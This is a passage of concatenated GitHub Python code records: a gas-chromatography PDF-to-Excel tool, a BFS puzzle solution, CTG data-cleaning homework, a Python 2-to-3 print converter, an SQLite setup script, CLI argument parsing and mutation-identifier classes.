flatten(something):\n list_o_list = []\n for k, v in something.items():\n key_list = [k]\n flatten_helper(v, key_list, list_o_list)\n return list_o_list\n\n\n# recursive helper for flattener\ndef flatten_helper(val, key_list, list_o_list):\n if isinstance(val, dict):\n for k, v in val.items():\n key_list.append(k)\n flatten_helper(v, key_list, list_o_list)\n key_list.pop()\n else:\n list_o_list.append(key_list + val)\n \n \n# output results to excel sheet\ndef output_data(samples, standards, longest_file_name, columns, dates, count):\n \n # column number map for flux formula\n column_number_map = {\n 1: 'A',\n 2: 'B',\n 3: 'C',\n 4: 'D',\n 5: 'E',\n 6: 'F',\n 7: 'G',\n 8: 'H',\n 9: 'I',\n 10: 'J'\n }\n\n # get output file location from user\n out = tkinter.filedialog.asksaveasfilename(defaultextension='.xlsx')\n workbook = xlsxwriter.Workbook(out)\n\n # setting up formatting for legibility \n title_format = workbook.add_format()\n title_format.set_bg_color('#65BDFB')\n\n data_format = {}\n flux_format = {}\n\n data_format[1] = workbook.add_format()\n data_format[1].set_bg_color('#A3D8FC')\n flux_format[1] = workbook.add_format({'bold': True})\n flux_format[1].set_bg_color('#A3D8FC')\n\n data_format[0] = workbook.add_format()\n data_format[0].set_bg_color('#C2E5FD')\n flux_format[0] = workbook.add_format({'bold': True})\n flux_format[0].set_bg_color('#C2E5FD')\n\n # publish standards sheet\n worksheet = workbook.add_worksheet(\"Standards\")\n worksheet.freeze_panes(1, 0)\n worksheet.write_row(0, 0, [\"Standard\", \"Methane (ppm)\", \"Carbon Dioxide (ppm)\", \"Oxygen (%)\", \"Nitrogen (%)\", \"Nitrous Oxide (ppm)\", \"File\"], title_format)\n row = 1\n data_format_num = 1\n for standard in standards:\n for k in range(len(standards[standard]['Methane'])):\n worksheet.write_row(row , 0, [standard, standards[standard]['Methane'][k], standards[standard]['Carbon Dioxide'][k], standards[standard]['Oxygen'][k], standards[standard]['Nitrogen'][k], standards[standard]['Nitrous Oxide'][k], standards[standard]['File'][k]], data_format[data_format_num])\n row += 1\n data_format_num = 1 - data_format_num\n \n # set column width for each gas\n worksheet.set_column(0, 0, len(\"standard\"))\n worksheet.set_column(1, 1, len(\"Methane (ppm)\"))\n worksheet.set_column(2, 2, len(\"Carbon Dioxide (ppm)\"))\n worksheet.set_column(3, 3, len(\"Oxygen (%)\"))\n worksheet.set_column(4, 4, len(\"Nitrogen (%)\"))\n worksheet.set_column(5, 5, len(\"Nitrous Oxide (ppm)\"))\n worksheet.set_column(6, 6, longest_file_name)\n\n # publish sample concentration results\n for date in dates:\n if str(date).lower() != 'blank':\n worksheet = workbook.add_worksheet(str(date))\n worksheet.set_column(0 + len(columns), 0 + len(columns), len(\"Methane (ppm)\"))\n worksheet.set_column(1 + len(columns), 1 + len(columns), len(\"Carbon Dioxide (ppm)\"))\n worksheet.set_column(2 + len(columns), 2 + len(columns), len(\"Oxygen (%)\"))\n worksheet.set_column(3 + len(columns), 3 + len(columns), len(\"Nitrogen (%)\"))\n worksheet.set_column(4 + len(columns), 4 + len(columns), len(\"Nitrous Oxide (ppm)\"))\n worksheet.set_column(5 + len(columns), 5 + len(columns), longest_file_name)\n\n row = 1 # current row number\n data_format_num = 1 # data format number for legibility\n worksheet.freeze_panes(1, 0) # freeze top row\n\n # print top row columns\n for k in range(len(columns)):\n worksheet.set_column(k, k, len(columns[k]))\n if k == count - 1:\n worksheet.set_column(k, k, len(\"RoC (ppm/min)\"))\n worksheet.write_row(0, 0, columns + [\"Methane (ppm)\", \"Carbon Dioxide (ppm)\", \"Oxygen (%)\", \"Nitrogen (%)\", \"Nitrous Oxide (ppm)\", \"File\"], title_format)\n \n # iterate through list of lists of each sample row\n current_sample = samples[0][1]\n for i in range(len(samples)):\n if samples[i][0] == date: # if it's the right date then print it\n if samples[i][1] != current_sample: # alternate output format for each sample for legibility\n data_format_num = 1 - data_format_num\n current_sample = samples[i][1]\n if samples[i][count] == 'RoC (ppm/min)': # bold rate of change\n worksheet.write_row(row, 0, samples[i][1:] + [''], flux_format[data_format_num])\n elif samples[i][count] == 'R2': # bold R2 and create row for volumn, temp, area reporting and flux formula\n worksheet.write_row(row, 0, samples[i][1:] + [''], flux_format[data_format_num])\n sample_row = samples[i][1:-6]\n row += 1\n\n # self reporting row for volume, temp and surface area\n worksheet.write_row(row, 0, sample_row + ['Volume: ', 1, 'Temp: ', 1, 'Surface Area:', 1, ''], flux_format[data_format_num])\n row += 1\n\n # CH4 flux excel formula builder\n CH4_flux = '=({}{}*({}{}/(0.0821*{}{}))*(0.016*1440)/({}{})*(12/16)/1000)'.format(\n column_number_map[count + 1], row - 2,\n column_number_map[count + 1], row,\n column_number_map[count + 3], row,\n column_number_map[count + 5], row)\n\n # CO2 flux excel formula builder\n CO2_flux = '=({}{}*({}{}/(0.0821*{}{}))*(0.044*1440)/({}{})*(12/44)/1000)'.format(\n column_number_map[count + 2], row - 2,\n column_number_map[count + 1], row,\n column_number_map[count + 3], row,\n column_number_map[count + 5], row)\n\n # write row with flux formulas\n worksheet.write_row(row, 0, sample_row + [\"Flux\", CH4_flux, CO2_flux, '', '', '', ''], flux_format[data_format_num])\n \n else: # regular data output\n worksheet.write_row(row, 0, samples[i][1:], data_format[data_format_num])\n row += 1\n workbook.close()\n return out\n\n\n#########################################################################################################################\n######################################## script execution starts here! ##################################################\n#########################################################################################################################\n\n\ndef GC():\n sample_rows = {}\n samples = {}\n standards = {}\n\n # GC form layout\n layout = [[sg.Text('GC Data Processing Tool', font='Any 36', background_color='#0680BF')],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.Text('PDF files folder:', size=(15, 1), background_color='#0680BF'), sg.Input(key='-FOLDER-'), sg.FolderBrowse()],\n [sg.Text('Naming regex:', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-REGEX-')],\n [sg.Text('Columns', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-COLS-')],\n [sg.Text('Standards', size=(15, 1), background_color='#0680BF'), sg.InputText(key='-STANDARDS-')],\n [sg.Checkbox(\"Calculate flux?\", key=\"-FLUX-\", background_color='#0680BF', enable_events=True)],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.Submit(), sg.Cancel()]]\n\n # Create the window\n window = sg.Window(\"GC\", layout, margins=(80, 50), background_color='#0680BF')\n cancelled = False\n\n # Create an event loop\n while True:\n event, values = window.read()\n # End program if user closes window or\n # presses the OK button\n if event == \"Submit\":\n break\n \n elif event == \"Cancel\" or event == sg.WIN_CLOSED:\n cancelled = True\n break\n \n # kill it if canceled\n if cancelled == False:\n\n try:\n print(\"Reading files\")\n folder = values['-FOLDER-']\n\n # get PDFs\n PDFs = get_PDFs(folder)\n\n if len(PDFs) == 0:\n raise Exception(\"Error: No PDFs found at selected location\")\n BAR_MAX = len(PDFs)\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted information\")\n\n try:\n # process input regex\n regex, count = process_regex(values['-REGEX-'])\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted naming regex\")\n\n try:\n # get different standards\n stans = values['-STANDARDS-'].split(',')\n for stan in stans:\n stan = stan.strip(' \\t\\n\\r')\n standards[stan] = {'Methane': [], 'Carbon Dioxide': [], 'Oxygen': [], 'Nitrogen': [], 'Nitrous Oxide': [], 'File': []}\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted standards\")\n\n try:\n # get columns\n columns = values['-COLS-'].split(', ')\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise Exception(\"Error in inputted columns\")\n\n # progress bar layout\n layout = [[sg.Text('GC Data Processing Tool', font='Any 36', background_color='#0680BF')],\n [sg.Text(\"Processing... This may take a few minutes\", background_color='#0680BF')],\n [sg.Text(\"\", background_color='#0680BF')],\n [sg.ProgressBar(BAR_MAX, orientation='h', size=(40, 15), key='-PROG-', bar_color=('#38E210', '#FFFFFF'))]]\n window.close()\n window = sg.Window(\"GC\", layout, margins = (80, 50), background_color='#0680BF')\n \n try:\n # process PDFs\n print(\"Processing PDFs\")\n samples, standards, sample_rows, longest_file_name, dates = process_PDFs(samples, standards, sample_rows, PDFs, window, regex, count)\n print(samples)\n\n # calculate flux if ticked\n if values['-FLUX-']:\n flux(samples, count)\n\n # flatten sample dictionary\n samples = flatten(samples)\n for row in samples:\n print(row)\n print(samples)\n\n print(\"Outputting results\")\n # output data to excel file\n out = output_data(samples, standards, longest_file_name, columns, dates, count)\n\n except Exception as e:\n window.close()\n print(traceback.format_exc())\n raise e\n \n window.close()\n return 0\n\n\nif __name__ == \"__main__\":\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(\"================================================================================\")\n print(\"============================ GC data processing tool ===========================\")\n print(\"================================================================================\\n\") \n\n sample_rows = {}\n samples = {}\n standards = {}\n\n root = tkinter.Tk()\n root.withdraw()\n print(\"Choose PDF files folder:\")\n folder = tkinter.filedialog.askdirectory(title = \"Choose folder\")\n regex = input(\"Enter a regex: \")\n columns = input(\"Enter columns: \").split(', ')\n standards = input(\"Enter standards\").split(', ')\n calculate_flux = ''\n while calculate_flux.lower() != 'n' and calculate_flux.lower() != 'y':\n calculate_flux = input(\"Calculate flux? (y/n)\")\n\n\n PDFs = get_PDFs(folder)\n regex, count = process_regex(regex)\n samples, standards, sample_rows, longest_file_name, dates = process_PDFs(samples, standards, sample_rows, PDFs, False, regex, count)\n if calculate_flux == 'y':\n flux(samples, count)\n samples = flatten(samples)\n out = output_data(samples, standards, longest_file_name, columns, dates, count)\n","repo_name":"BrianNewton/PEDRO","sub_path":"GC.py","file_name":"GC.py","file_ext":"py","file_size_in_byte":20397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19001712343","text":"from collections import deque\nimport sys\nf_input = sys.stdin.readline\n\nN = int(f_input())\nmap_info = list()\nmin_height = 100\nmax_height = 1\nfor _ in range(N):\n row = list(map(int, f_input().split()))\n map_info.append(row)\n for r in row:\n if max_height < r:\n max_height = r\n if min_height > r:\n min_height = r\n\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\nmax_s_zone = 0\ns_zone = 0\nfor wl in range(min_height - 1, max_height):\n # wl(water level) 보다 높은 수위의 영역이 BFS 탐색 대상이 된다.\n visited = [[0] * N for _ in range(N)]\n queue = deque()\n s_zone = 0\n for r in range(N):\n for c in range(N):\n if map_info[r][c] > wl and visited[r][c] == 0:\n s_zone += 1\n queue.append((r, c))\n visited[r][c] = 1\n while queue:\n cr, cc = queue.popleft()\n for d in range(4):\n nr = cr + dy[d]\n nc = cc + dx[d]\n if 0 <= nr < N and 0 <= nc < N:\n if map_info[nr][nc] > wl and visited[nr][nc] == 0:\n queue.append((nr, nc))\n visited[nr][nc] = 1\n if s_zone > max_s_zone:\n max_s_zone = s_zone\n\nprint(max_s_zone)\n\n","repo_name":"ku-kim/Coding-Test-Study","sub_path":"Submit/dave/DFS_BFS/안전영역/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"70294243722","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 17:14:23 2019\n\n@author: smorandv\n\"\"\"\nimport numpy as np\nimport pandas as pd\n\n\ndef rm_ext_and_nan(CTG_features, extra_feature):\n \n \"\"\"\n :param CTG_features: Pandas series of CTG features\n :param extra_feature: A feature to be removed\n :return: A dictionary of clean CTG called c_ctg\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n c_ctg = CTG_features.apply(lambda col:pd.to_numeric(col,errors='coerce')).dropna().drop(\"{}\".format(extra_feature),1)\n # -------------------------------------------------------------------------\n\n return c_ctg\n\n\ndef nan2num_cdf(CTG_features, extra_feature):\n \"\"\"\n\n :param CTG_features: Pandas series of CTG features\n :param extra_feature: A feature to be removed\n :return: A pandas dataframe of the dictionary c_cdf containing the \"clean\" features\n \"\"\"\n c_cdf = {}\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n \n c_run = CTG_features.apply(lambda col:pd.to_numeric(col,errors='coerce')).drop(\"{}\".format(extra_feature),1)\n c_run = c_run.drop(c_run.index[0])\n temp = rm_ext_and_nan(CTG_features, extra_feature)\n \n for c in temp.keys() :\n cdf = np.cumsum(temp[c])/ np.sum(temp[c])\n sort_temp = temp[c].sort_values(ascending=True)\n num_of_nan = c_run[c].isnull().sum()\n rand_vec = np.random.uniform(0,1,num_of_nan)\n sampeled_vec = []\n j=0\n \n \n for i in range(num_of_nan):\n for k in range(cdf.shape[0]-1):\n if( (rand_vec[i] <= cdf.values[k+1]) & (rand_vec[i] >= cdf.values[k])):\n sampeled_vec.append(sort_temp.values[k])\n break\n \n \n for row in range(c_run.shape[0]):\n if(np.isnan(c_run[c].values[row])):\n c_run[c].values[row] = sampeled_vec[j]\n j=j+1\n if(j==num_of_nan):\n break\n \n c_cdf.update({c:c_run[c]})\n # -------------------------------------------------------------------------\n return pd.DataFrame(c_cdf)\n\n\ndef sum_stat(c_feat):\n \"\"\"\n\n :param c_feat: Output of nan2num_cdf\n :return: Summary statistics as a dicionary of dictionaries (called d_summary) as explained in the notebook\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n d_summary={}\n for c in c_feat.keys():\n minimum = c_feat[c].min()\n quar = c_feat[c].quantile(0.25)\n med = c_feat[c].median()\n tri_quart=c_feat[c].quantile(0.75)\n maximum = c_feat[c].max()\n new ={\"min\":minimum,\"Q1\":quar,\"median\":med,\"Q3\":tri_quart,\"max\":maximum}\n d_summary.update({c:new})\n # -------------------------------------------------------------------------\n return d_summary\n\n\ndef rm_outlier(c_feat, d_summary):\n \"\"\"\n\n :param c_feat: Output of nan2num_cdf\n :param d_summary: Output of sum_stat\n :return: Dataframe of the dictionary c_no_outlier containing the feature with the outliers removed\n \"\"\"\n c_no_outlier = {}\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n for c in c_feat.keys() :\n iqr = d_summary[c]['Q3']-d_summary[c]['Q1']\n upper = d_summary[c]['Q3']+ iqr * 1.5\n lower = d_summary[c]['Q1']- iqr * 1.5\n c_feat_coll = c_feat[c]\n new = c_feat_coll[(c_feat_coll <= upper) & (c_feat_coll >= lower)]\n c_no_outlier.update({c:new})\n\n # -------------------------------------------------------------------------\n return pd.DataFrame(c_no_outlier)\n\n\ndef phys_prior(c_cdf, feature, thresh):\n \"\"\"\n\n :param c_cdf: Output of nan2num_cdf\n :param feature: A string of your selected feature\n :param thresh: A numeric value of threshold\n :return: An array of the \"filtered\" feature called filt_feature\n \"\"\"\n # ------------------ IMPLEMENT YOUR CODE HERE:-----------------------------\n \n filt_feature = c_cdf[feature]\n filt_feature = np.array(filt_feature[filt_feature <= thresh])\n # -------------------------------------------------------------------------\n return filt_feature\n\n\ndef norm_standard(CTG_features, selected_feat=('LB', 'ASTV'), mode='none', flag=False):\n \"\"\"\n\n :param CTG_features: Pandas series of CTG features\n :param selected_feat: A two elements tuple of strings of the features for comparison\n :param mode: A string determining the mode according to the notebook\n :param flag: A boolean determining whether or not plot a histogram\n :return: Dataframe of the normalized/standardazied features called nsd_res\n \"\"\"\n x, y = selected_feat\n # ------------------ IMPLEMENT YOUR CODE HERE:------------------------------\n nsd_res = CTG_features.copy()\n \n if(mode == 'standard'):\n for i in nsd_res.keys():\n nsd_res[i]=(nsd_res[i]- nsd_res[i].median())/nsd_res[i].std()\n \n if(mode == 'MinMax'):\n for i in nsd_res.keys():\n nsd_res[i] = (nsd_res[i]-nsd_res[i].min())/(nsd_res[i].max()-nsd_res[i].min())\n \n if(mode == 'mean'):\n for i in nsd_res.keys():\n nsd_res[i] = (nsd_res[i]-nsd_res[i].mean())/(nsd_res[i].max()-nsd_res[i].min())\n \n if(flag == True):\n import matplotlib.pyplot as plt\n plt.hist(nsd_res[x], bins=80,label=x)\n plt.hist(nsd_res[y], bins=80,label=y)\n plt.ylabel('Frequency')\n plt.xlabel('Values')\n plt.legend(loc='upper right')\n plt.show() \n # -------------------------------------------------------------------------\n return pd.DataFrame(nsd_res)\n","repo_name":"mlh-master/hw1_mlh-naama-daniel","sub_path":"HW1-master/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36168450371","text":"## auxiliary tools to transform python files from 2.x to 3.x, when deploying old 2.x projects.\n## Author: XZhou, 19th April 2018\n\n# encoding: UTF-8\nimport re\n\nInputFile = r'F:\\PythonSpace\\ReansformPyfileFrom2xTo3x_example.py'\nOutputFile = InputFile+'.py3x'\n\n## First Step, update the function of print\nprint('start to replace \"print xxx\" by \"print (xxx)\"!')\nwith open(OutputFile, 'w') as ofd:\n with open(InputFile) as fd:\n while 1:\n line = fd.readline()\n if not line:\n break\n if re.match(r'^[ ]*print[ ]+.*', line):\n if not re.search('^[ ]*print[ ]*\\(.*\\)$', line):\n splitlines = re.split(r'^([ ]*print[ ]+)(.*)([ ]*)$', line)\n ofd.write(splitlines[1]+'('+splitlines[2]+splitlines[3]+')' + '\\n')\n else:\n ofd.write(line)\n else:\n ofd.write(line)\n","repo_name":"serieslover/auxiliary-tools-for-python","sub_path":"TransformPyfileFrom2xTo3x.py","file_name":"TransformPyfileFrom2xTo3x.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4232789279","text":"import sqlite3\nimport sys\nimport os\n\ncurpath = os.path.dirname(__file__)\nif(curpath not in sys.path):\n sys.path.append(curpath)\n\ndbPath = 'data.db'\n\nconn = sqlite3.connect(dbPath)\n\ningTable = ('CREATE TABLE IF NOT EXISTS ingredients( '\n ' id integer primary key autoincrement not null, '\n ' name varchar(255) unique not null, '\n ' jar_pos integer unique ,'\n ' mixer integer default 0'\n ');')\n\nconn.execute(ingTable)\n\ndrinkTable = ('CREATE TABLE IF NOT EXISTS drinks( '\n ' id integer primary key autoincrement not null, '\n ' name varchar(255) unique not null, '\n ' image varchar(255), '\n ' notes TEXT'\n ');')\n\nconn.execute(drinkTable)\n\ndrinkIngTable = ('CREATE TABLE IF NOT EXISTS drink_ingredient( '\n ' drink_id integer not null, '\n ' ingredient_id integer not null, '\n ' oz real not null,'\n ' FOREIGN KEY(drink_id) REFERENCES drinks(id) ON DELETE CASCADE, '\n ' FOREIGN KEY(ingredient_id) REFERENCES ingredients(id) ON DELETE CASCADE '\n ');')\n\nconn.execute(drinkIngTable)\n\nconn.commit()\nconn.close()\n","repo_name":"Just-The-Chip/cocktail_control","sub_path":"setupdb.py","file_name":"setupdb.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"18591912522","text":"import logging\nimport sys\n\nfrom ._typing import Any, Dict, List, Optional, Tuple\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef parse_command_line_arguments():\n # type: () -> Optional[Dict[str, Any]]\n if len(sys.argv) > 1:\n try:\n return _parse_cmd_args(sys.argv[1:])\n\n except ValueError:\n LOGGER.debug(\"Failed to parse argv values. Fallback to naive parsing.\")\n return _parse_cmd_args_naive(sys.argv[1:])\n\n\ndef _parse_cmd_args_naive(to_parse):\n # type: (List[Any]) -> Optional[Dict[str, Any]]\n vals = {}\n if len(to_parse) > 1:\n for i, arg in enumerate(to_parse):\n vals[\"run_arg_%s\" % i] = str(arg)\n\n return vals\n\n\ndef _parse_cmd_args(argv_vals):\n # type: (List[Any]) -> Optional[Dict[str, Any]]\n \"\"\"\n Parses the value of argv[1:] to a dictionary of param,value. Expects params name to start with a - or --\n and value to follow. If no value follows that param is considered to be a boolean param set to true.(e.g --test)\n Args:\n argv_vals: The sys.argv[] list without the first index (script name). Basically sys.argv[1:]\n\n Returns: Dictionary of param_names, param_values\n\n \"\"\"\n results = {}\n\n split_argv_vals = []\n for word in argv_vals:\n if word == \"--\":\n continue # skip it\n elif \"=\" in word:\n key, value = _parse_arg_value_with_equal(word)\n results[key] = value\n else:\n split_argv_vals.append(word)\n\n current_key = None\n for word in split_argv_vals:\n word = word.strip()\n\n if word[0] == \"-\":\n prefix = 1\n if len(word) > 1 and word[1] == \"-\":\n prefix = 2\n\n if current_key is not None:\n # if we found a new key but haven't found a value to the previous\n # key it must have been a boolean argument.\n results[current_key] = True\n\n current_key = word[prefix:]\n\n else:\n word = word.strip()\n if current_key is None:\n # we failed to parse the string. We think this is a value, but we don't know what's the key.\n # fallback to naive parsing.\n raise ValueError(\"Failed to parse argv arguments\")\n\n else:\n word = _guess_type(word)\n results[current_key] = word\n current_key = None\n\n if current_key is not None:\n # last key was a boolean\n results[current_key] = True\n\n return results\n\n\ndef _parse_arg_value_with_equal(arg_val):\n # type: (str) -> Tuple[str, str]\n values = arg_val.split(\"=\", 1)\n key = values[0]\n while key[0] == \"-\":\n key = key.replace(\"-\", \"\", 1)\n\n return key.strip(), _guess_type(values[1].strip())\n\n\ndef _guess_type(s):\n import ast\n\n try:\n return ast.literal_eval(s)\n\n except (ValueError, SyntaxError):\n return str(s)\n","repo_name":"kchaehyeon01/AI_HaniumAdvDef","sub_path":"models/Def_DiffPure/source1 _ labml _ comet/comet_ml/comet_ml/cli_args_parse.py","file_name":"cli_args_parse.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"44940102057","text":"import json\nimport typing\n\n\nclass ProteinMutationIdentifier:\n\n def __init__(self, gene:str, ref:str, position:[str, int], alt:str, note:str=\"\", source:str=\"\"):\n self.gene = gene\n self.position = str(position)\n self.ref = ref\n if not ref:\n self.ref = \"-\"\n self.alt = alt\n if not alt:\n self.alt = \"-\"\n self.note = note\n self.source = source\n\n @property\n def proteinChangeNotation(self):\n if self.ref == \"-\":\n return \"%s:ins%s %s\" % (self.gene, self.position, self.alt)\n elif self.alt == \"-\":\n return \"%s:del%s %s\" % (self.gene, self.position, self.ref)\n else:\n return \"%s:%s%s%s\" % (self.gene, self.ref, self.position, self.alt)\n\n @property\n def dictionary(self):\n dictionary = {\n \"gene\": self.gene,\n \"position\": self.position,\n \"ref\": self.ref,\n \"alt\": self.alt,\n \"note\": self.note,\n \"source\": self.source\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def fromDict(cls, dictionary:dict):\n return cls(**dictionary)\n\n @classmethod\n def fromJSON(cls, jsonString:str):\n return cls.fromDict(json.loads(jsonString))\n\n @classmethod\n def fromString(cls, string, note:str=\"\", source:str=\"\"):\n string = string.strip()\n try:\n gene, change = string.split(\":\")\n change = change.strip()\n except ValueError:\n raise ValueError(\"Protein change notation should be Gene:change with only one colon character. That was not the number detected in %s.\" %string)\n if \"ins\" in change:\n ref = \"-\"\n change = change.replace(\"ins\", \"\")\n try:\n pos, alt = change.split()\n except ValueError:\n raise ValueError(\"Protein insertion notation should be gene:ins[position] [sequence]. That notation was not parsed in %s\" %string)\n elif \"del\" in change:\n alt = \"-\"\n change = change.replace(\"del\", \"\")\n try:\n pos, ref = change.split()\n except ValueError:\n raise ValueError(\"Protein deletion notation should be gene:ins[position] [sequence]. That notation was not parsed in %s\" %string)\n else:\n ref = change[0]\n alt = change[-1]\n pos = change[1:-1]\n try:\n pos = int(pos)\n except ValueError:\n raise ValueError(\"Protein substitution notation should be gene:[ref][position][alt] (such as S:D614G), but that format was not parsed from %s\" %string)\n return cls(gene, ref, pos, alt, note, source)\n\n def __str__(self):\n return \"%s_%s_%s_%s\" %(self.gene, self.position, self.ref, self.alt)\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return self.gene == other.gene and self.position == other.position and self.ref == other.ref and self.alt == other.alt\n\n def __gt__(self, other):\n if self == other:\n return False\n if self.gene > other.gene:\n return True\n elif self.gene < other.gene:\n return False\n else:\n if self.position > other.position:\n return True\n elif self.position < other.position:\n return False\n else:\n if self.ref > other.ref:\n return True\n elif self.ref < other.ref:\n return False\n else:\n if self.alt > other.alt:\n return True\n elif self.alt < other.alt:\n return False\n else:\n raise ValueError(\"Should never be able to reach this point. Did so comparing greater than for %s and %s\" %(self, other))\n\n def __lt__(self, other):\n return not (self > other or self == other)\n\n def __le__(self, other):\n return self < other or self == other\n\n def __ge__(self, other):\n return self > other or self == other\n\n\n\nclass NucleicAcidMutationIdentifier:\n\n def __init__(self, contig:str, position:[str, int], ref:str, alt:str, note:str=\"\", source:str=\"\"):\n self.contig = contig\n self.position = str(position)\n self.ref = ref\n self.alt = alt\n self.note = note\n self.source = source\n\n @property\n def vepIdentifier(self):\n return \"%s_%s_%s/%s\" % (self.contig, self.position, self.ref, self.alt)\n\n @property\n def dictionary(self):\n dictionary = {\n \"contig\": self.contig,\n \"position\": self.position,\n \"ref\": self.ref,\n \"alt\": self.alt,\n \"note\": self.note,\n \"source\": self.source\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def fromDict(cls, dictionary: dict):\n return cls(**dictionary)\n\n @classmethod\n def fromJSON(cls, jsonString: str):\n return cls.fromDict(json.loads(jsonString))\n\n @classmethod\n def fromVEPString(cls, vepString:str, note:str=\"\", source:str=\"\"):\n identifierSplit = vepString.split(\"_\")\n if not len(identifierSplit) >= 3:\n raise ValueError(\"VEP identifiers should be at least three fields\")\n variation = identifierSplit[-1]\n position = int(identifierSplit[-2])\n contig = \"_\".join(identifierSplit[:-2])\n ref, alt = variation.split(\"/\")[:2]\n return cls(contig, position, ref, alt, note, source)\n\n def __str__(self):\n return \"%s_%s_%s_%s\" % (self.contig, self.position, self.ref, self.alt)\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return self.contig == other.contig and self.position == other.position and self.ref == other.ref and self.alt == other.alt\n\n def __gt__(self, other):\n if self == other:\n return False\n if self.contig > other.gene:\n return True\n elif self.contig < other.gene:\n return False\n else:\n if self.position > other.position:\n return True\n elif self.position < other.position:\n return False\n else:\n if self.ref > other.ref:\n return True\n elif self.ref < other.ref:\n return False\n else:\n if self.alt > other.alt:\n return True\n elif self.alt < other.alt:\n return False\n else:\n raise ValueError(\n \"Should never be able to reach this point. Did so comparing greater than for %s and %s\" % (\n self, other))\n\n def __lt__(self, other):\n return not (self > other or self == other)\n\n def __le__(self, other):\n return self < other or self == other\n\n def __ge__(self, other):\n return self > other or self == other\n\n\nclass MutationIdentifier:\n\n def __init__(self, proteinChange:[str, ProteinMutationIdentifier]=None, nucleicAcidChange:[str, NucleicAcidMutationIdentifier]=None, notes:str=\"\", source:str=\"\"):\n if not proteinChange and not nucleicAcidChange:\n raise ValueError(\"Unable to create a mutation data set with no mutation data associated.\")\n if type(proteinChange) == str:\n proteinChange = ProteinMutationIdentifier.fromString(proteinChange)\n self.proteinChange = proteinChange\n if type(nucleicAcidChange) == str:\n nucleicAcidChange = NucleicAcidMutationIdentifier.fromVEPString(nucleicAcidChange)\n self.nucleicAcidChange = nucleicAcidChange\n self.notes = notes\n self.source = source\n\n @property\n def dictionary(self):\n proteinDict = None\n if self.proteinChange:\n proteinDict = self.proteinChange.dictionary\n nucleicAcidDict = None\n if self.nucleicAcidChange:\n nucleicAcidDict = self.nucleicAcidChange.dictionary\n returnDict = {\n \"protein\": proteinDict,\n \"nucleic acid\": nucleicAcidDict,\n \"notes\": self.notes,\n \"source\": self.source\n }\n return returnDict\n\n @classmethod\n def fromDict(cls, dictionary:dict):\n if not dictionary[\"protein\"]:\n proteinChange = None\n else:\n proteinChange = ProteinMutationIdentifier.fromDict(dictionary[\"protein\"])\n if not dictionary[\"nucleic acid\"]:\n nucleicAcidChange = None\n else:\n nucleicAcidChange = NucleicAcidMutationIdentifier.fromDict(dictionary[\"nucleic acid\"])\n source = dictionary[\"source\"]\n notes = dictionary[\"notes\"]\n return cls(proteinChange, nucleicAcidChange, notes, source)\n\n def __eq__(self, other):\n if self.nucleicAcidChange and other.nucleicAcidChange:\n return self.nucleicAcidChange == other.nucleicAcidChange\n elif self.proteinChange and other.proteinChange:\n return self.proteinChange == other.proteinChange\n\n\nclass StrainIdentifier:\n\n def __init__(self, identifier: str, commonName: str, location: str, aliases: list, mutations:typing.List[MutationIdentifier], source:str=\"\", notes:str=\"\"):\n self.identifier = identifier\n self.commonName = commonName\n self.location = location\n self.aliases = aliases\n self.source = source\n self.notes = notes\n self.mutationList = mutations\n self.nucleotideMutations, self.proteinMutations = self.makeMutationDictionaries(mutations)\n\n @staticmethod\n def makeMutationDictionaries(mutations: typing.List[MutationIdentifier]):\n nucleotideMutations = {}\n proteinMutations = {}\n for mutation in mutations:\n if mutation.proteinChange:\n gene = mutation.proteinChange.gene\n if not gene in proteinMutations:\n proteinMutations[gene] = []\n proteinMutations[gene].append(mutation)\n if mutation.nucleicAcidChange:\n contig = mutation.nucleicAcidChange.contig\n if not contig in nucleotideMutations:\n nucleotideMutations[contig] = {}\n position = mutation.nucleicAcidChange.position\n if not position in nucleotideMutations[contig]:\n nucleotideMutations[contig][position] = []\n nucleotideMutations[contig][position].append(mutation)\n return nucleotideMutations, proteinMutations\n\n @property\n def dictionary(self):\n mutationList = [mutation.dictionary for mutation in self.mutationList]\n dictionary = {\n \"identifier\": self.identifier,\n \"common name\": self.commonName,\n \"location\": self.location,\n \"aliases\": self.aliases,\n \"mutations\": mutationList,\n \"source\": self.source,\n \"notes\": self.notes\n }\n return dictionary\n\n @property\n def json(self):\n return json.dumps(self.dictionary, indent=4)\n\n @classmethod\n def fromDict(cls, dictionary: dict):\n mutationList = 